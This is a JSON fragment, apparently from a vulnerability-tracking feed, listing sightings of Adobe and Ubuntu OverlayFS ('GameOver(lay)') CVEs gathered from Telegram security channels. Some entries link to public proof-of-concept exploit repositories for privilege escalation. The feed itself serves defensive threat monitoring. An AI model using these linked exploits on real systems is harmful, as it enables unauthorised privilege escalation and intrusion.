"creation_timestamp": "2023-07-27T15:34:09.000000Z"}, {"uuid": "118f0273-33b8-4440-a50b-e8ee049bbef8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-26402", "type": "seen", "source": "https://t.me/cibsecurity/62040", "content": "\u203c CVE-2023-26402 \u203c\n\nAdobe Substance 3D Stager version 2.0.1 (and earlier) is affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-04-13T02:29:37.000000Z"}, {"uuid": "f541537a-9126-469c-b04f-a4b687e6b71a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-26403", "type": "seen", "source": "https://t.me/cibsecurity/62038", "content": "\u203c CVE-2023-26403 \u203c\n\nAdobe Substance 3D Stager version 2.0.1 (and earlier) is affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-04-13T02:29:35.000000Z"}, {"uuid": "1b0c07b7-0615-42cf-94d1-1ee65ca67b4a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-26409", "type": "seen", "source": "https://t.me/cibsecurity/62090", "content": "\u203c CVE-2023-26409 \u203c\n\nAdobe Substance 3D Designer version 12.4.0 (and earlier) is affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-04-14T00:25:25.000000Z"}, {"uuid": "c57580bf-835f-4fa3-a890-5f2df85eed8d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-26405", "type": "seen", "source": "https://t.me/cibsecurity/62020", "content": "\u203c CVE-2023-26405 \u203c\n\nAdobe Acrobat Reader versions 23.001.20093 (and earlier) and 20.005.30441 (and earlier) are affected by an Improper Input Validation vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-04-13T00:24:30.000000Z"}, {"uuid": "f5f806d9-1a82-41d5-9946-f46cfd950f37", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-26404", "type": "seen", "source": "https://t.me/cibsecurity/62017", "content": "\u203c CVE-2023-26404 \u203c\n\nAdobe Dimension version 3.4.8 (and earlier) is affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-04-13T00:24:27.000000Z"}, {"uuid": "480baf91-07e8-4c04-abfa-4655c9ed2972", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-26408", "type": "seen", "source": "https://t.me/cibsecurity/62016", "content": "\u203c CVE-2023-26408 \u203c\n\nAdobe Acrobat Reader versions 23.001.20093 (and earlier) and 20.005.30441 (and earlier) are affected by an Improper Access Control vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-04-13T00:24:23.000000Z"}, {"uuid": "edd30665-d8cd-4240-994d-007b9b99d222", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-26406", "type": "seen", "source": "https://t.me/cibsecurity/62025", "content": "\u203c CVE-2023-26406 \u203c\n\nAdobe Acrobat Reader versions 23.001.20093 (and earlier) and 20.005.30441 (and earlier) are affected by an Improper Access Control vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-04-13T00:24:38.000000Z"}, {"uuid": "b253213d-5857-43be-aeba-4488a555d8ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-2640", "type": "seen", "source": "https://t.me/information_security_channel/50345", "content": "Two New Vulnerabilities Could affect 40% of Ubuntu Cloud Workloads\nhttps://www.securityweek.com/two-new-vulnerabilities-could-affect-40-of-ubuntu-cloud-workloads/\n\nResearchers discovered two vulnerabilities in the Ubuntu OverlayFS module: CVE-2023-2640 and CVE-2023-32629 (together dubbed \u2018GameOver(lay)\u2019).\nThe post Two New Vulnerabilities Could affect 40% of Ubuntu Cloud Workloads (https://www.securityweek.com/two-new-vulnerabilities-could-affect-40-of-ubuntu-cloud-workloads/) appeared first on SecurityWeek (https://www.securityweek.com/).", "creation_timestamp": "2023-07-27T17:41:47.000000Z"}, {"uuid": "4f8660b2-38c8-449e-b22f-fb87e4a2bebc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-2640", "type": "published-proof-of-concept", "source": "https://t.me/xakep_ru/15578", "content": "HTB Analytics. \u0418\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c \u0431\u0430\u0433 \u0432 OverlayFS, \u0447\u0442\u043e\u0431\u044b \u0441\u0431\u0435\u0436\u0430\u0442\u044c \u0438\u0437 Docker #\u0441\u0442\u0430\u0442\u044c\u0438 #\u043f\u043e\u0434\u043f\u0438\u0441\u0447\u0438\u043a\u0430\u043c\n\n\u0412 \u044d\u0442\u043e\u043c \u0440\u0430\u0439\u0442\u0430\u043f\u0435 \u044f \u043f\u043e\u043a\u0430\u0436\u0443 \u043f\u0440\u043e\u0446\u0435\u0441\u0441 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2023-2640\u00a0\u0432\u00a0\u0444\u0430\u0439\u043b\u043e\u0432\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 OverlayFS \u0434\u043b\u044f\u00a0Linux, \u043d\u043e\u00a0\u0441\u043d\u0430\u0447\u0430\u043b\u0430 \u043d\u0430\u043c \u043d\u0443\u0436\u043d\u043e \u0431\u0443\u0434\u0435\u0442 \u0430\u0442\u0430\u043a\u043e\u0432\u0430\u0442\u044c \u0441\u0438\u0441\u0442\u0435\u043c\u0443 Metabase, \u0447\u0442\u043e\u0431\u044b \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u043a\u00a0\u0445\u043e\u0441\u0442\u0443.\n\nhttps://xakep.ru/2024/03/25/htb-analytics/", "creation_timestamp": "2024-03-25T15:33:18.000000Z"}, {"uuid": "7fc6d776-774a-421b-9af2-9ce3de7452cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-2640", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/1264", "content": "https://github.com/g1vi/CVE-2023-2640-CVE-2023-32629\nGameOver(lay) Ubuntu Privilege Escalation\n#github #\u63d0\u6743", "creation_timestamp": "2023-10-11T10:45:51.000000Z"}, {"uuid": "ec18ec5e-48d6-4622-903a-a98e8647a19a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-2640", "type": "seen", "source": "Telegram/G4AW0LQIV4iuRpDrb2tyJjepniTBL8IjKjVA3meJv4H2Zps", "content": "", "creation_timestamp": "2023-11-14T03:53:03.000000Z"}, {"uuid": "f8302786-58f5-4963-b5cf-8c8364aea767", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-2640", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/1494", "content": "https://gist.github.com/win3zz/aa1ac16c4458aaaec6dd79343b8cd46f\n\nCVE-2023-2640 and CVE-2023-32629", "creation_timestamp": "2023-11-12T07:35:39.000000Z"}, {"uuid": "0fe8d830-9521-4f04-94ab-3d6368fd9adf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-2640", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/9367", "content": "#exploit\n1. CVE-2023-32629:\nUbuntu Privilege Escalation bash one-liner\nhttps://github.com/ThrynSec/CVE-2023-32629-CVE-2023-2640---POC-Escalation\n\n2. Unpatched Powerful SSRF in Exchange OWA - Getting Response Through Attachments\nhttps://www.zerodayinitiative.com/blog/2023/11/1/unpatched-powerful-ssrf-in-exchange-owa-getting-response-through-attachments\n\n3. Container Vulnerability Exploits\nhttps://github.com/h4ckm310n/Container-Vulnerability-Exploit", "creation_timestamp": "2023-11-10T13:37:01.000000Z"}, {"uuid": "91e181a6-c35e-43a9-8d53-0665d5a7b341", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-2640", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/9175", "content": "#exploit\n1. CVE-2023-43641:\n1-Click RCE on GNOME (libcue)\nhttps://github.blog/2023-10-09-coordinated-disclosure-1-click-rce-on-gnome-cve-2023-43641\n\n2. CVE-2022-4908:\nSOP bypass in Chrome using Navigation API\nhttps://joaxcar.com/blog/2023/10/06/cve-2022-4908-sop-bypass-in-chrome-using-navigation-api\n\n3. CVE-2023-2640, CVE-2023-32629:\n\"GameOver(lay)\" Ubuntu Privilege Escalation\nhttps://github.com/g1vi/CVE-2023-2640-CVE-2023-32629", "creation_timestamp": "2025-01-24T11:06:04.000000Z"}, {"uuid": "6d737770-3fe8-417f-9944-4d54c54d0c3e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-2640", "type": "published-proof-of-concept", "source": "https://t.me/Rootsec_2/1684", "content": "#exploit\n1. CVE-2023-32629:\nUbuntu Privilege Escalation bash one-liner\nhttps://github.com/ThrynSec/CVE-2023-32629-CVE-2023-2640---POC-Escalation\n\n2. Unpatched Powerful SSRF in Exchange OWA - Getting Response Through Attachments\nhttps://www.zerodayinitiative.com/blog/2023/11/1/unpatched-powerful-ssrf-in-exchange-owa-getting-response-through-attachments\n\n3. Container Vulnerability Exploits\nhttps://github.com/h4ckm310n/Container-Vulnerability-Exploit", "creation_timestamp": "2024-08-16T08:45:52.000000Z"}, {"uuid": "a83b154b-4926-46b6-86bd-a2f65c719721", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-2640", "type": "published-proof-of-concept", "source": "https://t.me/Rootsec_2/1327", "content": "#exploit\n1. CVE-2023-43641:\n1-Click RCE on GNOME (libcue)\nhttps://github.blog/2023-10-09-coordinated-disclosure-1-click-rce-on-gnome-cve-2023-43641\n\n2. CVE-2022-4908:\nSOP bypass in Chrome using Navigation API\nhttps://joaxcar.com/blog/2023/10/06/cve-2022-4908-sop-bypass-in-chrome-using-navigation-api\n\n3. CVE-2023-2640, CVE-2023-32629:\n\"GameOver(lay)\" Ubuntu Privilege Escalation\nhttps://github.com/g1vi/CVE-2023-2640-CVE-2023-32629", "creation_timestamp": "2024-08-16T08:32:36.000000Z"}, {"uuid": "18817ead-e300-42fb-95f8-0f1bc7c0da4d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-2640", "type": "seen", "source": "https://t.me/sysodmins/18938", "content": "\u0414\u0432\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u044e\u0442 \u043e\u043a\u043e\u043b\u043e 40% \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 Ubuntu\n\nCVE-2023-2640 \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0430 7,8 \u0431\u0430\u043b\u043b\u0430 \u043f\u043e \u0448\u043a\u0430\u043b\u0435 CVSS v3. \u041e\u043d\u0430 \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u0435\u0442 \u0438\u0437-\u0437\u0430 \u043d\u0435\u043a\u043e\u0440\u0440\u0435\u043a\u0442\u043d\u044b\u0445 \u043f\u0440\u043e\u0432\u0435\u0440\u043e\u043a \u043f\u0440\u0430\u0432 \u0432 \u044f\u0434\u0440\u0435 Linux. \u0421 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u044d\u0442\u043e\u0433\u043e \u0431\u0430\u0433\u0430 \u0443\u0441\u043b\u043e\u0432\u043d\u044b\u0439 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u043d\u044b\u0435 \u043f\u0440\u0430\u0432\u0430 \u0432 \u041e\u0421. \n\nCVE-2023-32629 \u2014 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0441\u0440\u0435\u0434\u043d\u0435\u0439 \u0441\u0442\u0435\u043f\u0435\u043d\u0438 \u0440\u0438\u0441\u043a\u0430 (5,4 \u0431\u0430\u043b\u043b\u0430 \u043f\u043e CVSS v3). \u0417\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u043f\u043e\u0434\u0441\u0438\u0441\u0442\u0435\u043c\u0443 \u044f\u0434\u0440\u0430 Linux, \u043e\u0442\u0432\u0435\u0447\u0430\u044e\u0449\u0443\u044e \u0437\u0430 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u043f\u0430\u043c\u044f\u0442\u044c\u044e, \u0438 \u043c\u043e\u0436\u0435\u0442 \u043f\u0440\u0438\u0432\u0435\u0441\u0442\u0438 \u043a use-after-free, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044f \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0435\u043c\u0443 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434. \n\n\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0442\u044c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043f\u043e\u043c\u043e\u0433\u043b\u0438 \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e\u0441\u0442\u0438 \u0438\u043c\u043f\u043b\u0435\u043c\u0435\u043d\u0442\u0430\u0446\u0438\u0438 \u043c\u043e\u0434\u0443\u043b\u044f OverlayFS \u0432 \u044f\u0434\u0440\u0435 Linux. OverlayFS - \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u044f \u0444\u0430\u0439\u043b\u043e\u0432\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u0441 \u043e\u0431\u044a\u0435\u0434\u0438\u043d\u0451\u043d\u043d\u044b\u043c \u043c\u043e\u043d\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435\u043c, \u043e\u043d\u0430, \u043a\u0441\u0442\u0430\u0442\u0438, \u0432 \u043f\u0440\u043e\u0448\u043b\u043e\u043c \u0443\u0436\u0435 \u0432\u044b\u0437\u044b\u0432\u0430\u043b\u0430 \u0438\u043d\u0442\u0435\u0440\u0435\u0441 \u043a\u0438\u0431\u0435\u0440\u043f\u0440\u0435\u0441\u0442\u0443\u043f\u043d\u0438\u043a\u043e\u0432. \u041c\u043e\u0434\u0443\u043b\u044c OverlayFS \u0442\u0430\u043a\u0436\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0432 Ubuntu \u0438 \u0434\u043e 2019 \u0433\u043e\u0434\u0430 \u043e\u043d \u0444\u0443\u043d\u043a\u0446\u0438\u043e\u043d\u0438\u0440\u043e\u0432\u0430\u043b \u0432 \u044d\u0442\u043e\u043c \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u0435 \u0431\u0435\u0437 \u0431\u0430\u0433\u043e\u0432. \u041e\u0434\u043d\u0430\u043a\u043e \u0432 2019 \u0438 2022 \u0433\u043e\u0434\u0430\u0445 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0438 \u0432\u043d\u0435\u0441\u043b\u0438 \u0440\u044f\u0434 \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u0439, \u043f\u0440\u043e\u0442\u0438\u0432\u043e\u0440\u0435\u0447\u0430\u0449\u0438\u0445 \u0441\u043e\u0431\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0439 \u0438\u043c\u043f\u043b\u0435\u043c\u0435\u043d\u0442\u0430\u0446\u0438\u0438 \u043c\u043e\u0434\u0443\u043b\u044f \u0432 Ubuntu.\n\n\u0418\u043c\u0435\u043d\u043d\u043e \u044d\u0442\u0438 \u043a\u043e\u043d\u0444\u043b\u0438\u043a\u0442\u044b \u043f\u0440\u0438\u0432\u0435\u043b\u0438 \u043a \u043f\u043e\u044f\u0432\u043b\u0435\u043d\u0438\u044e \u0434\u0432\u0443\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439. \u041a\u043e\u0434 \u0434\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0445 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u0432 \u0443\u0436\u0435 \u0434\u043e\u0441\u0442\u0443\u043f\u0435\u043d \u0432\u0441\u0435\u043c \u0436\u0435\u043b\u0430\u044e\u0449\u0438\u043c, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u0434\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0432 \u0440\u0435\u0430\u043b\u044c\u043d\u044b\u0445 \u043a\u0438\u0431\u0435\u0440\u0430\u0442\u0430\u043a\u0430\u0445 - \u0440\u0443\u043a\u043e\u0439 \u043f\u043e\u0434\u0430\u0442\u044c. \n\nUbuntu \u0443\u0436\u0435 \u043f\u043e\u0434\u0433\u043e\u0442\u043e\u0432\u0438\u043b\u0438 \u043f\u0430\u0442\u0447\u0438: https://ubuntu.com/security/notices/USN-6250-1\n\n\u0422\u0438\u043f\u0438\u0447\u043d\u044b\u0439 \ud83e\udd78 \u0421\u0438\u0441\u0430\u0434\u043c\u0438\u043d", "creation_timestamp": "2023-07-27T15:32:19.000000Z"}, {"uuid": "21bb4b83-c24e-4f97-836e-a51d235d0d9c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2023-2640", "type": "seen", "source": "https://www.hkcert.org/security-bulletin/ubuntu-linux-kernel-multiple-vulnerabilities_20260511", "content": "", "creation_timestamp": "2026-05-10T18:00:00.000000Z"}]}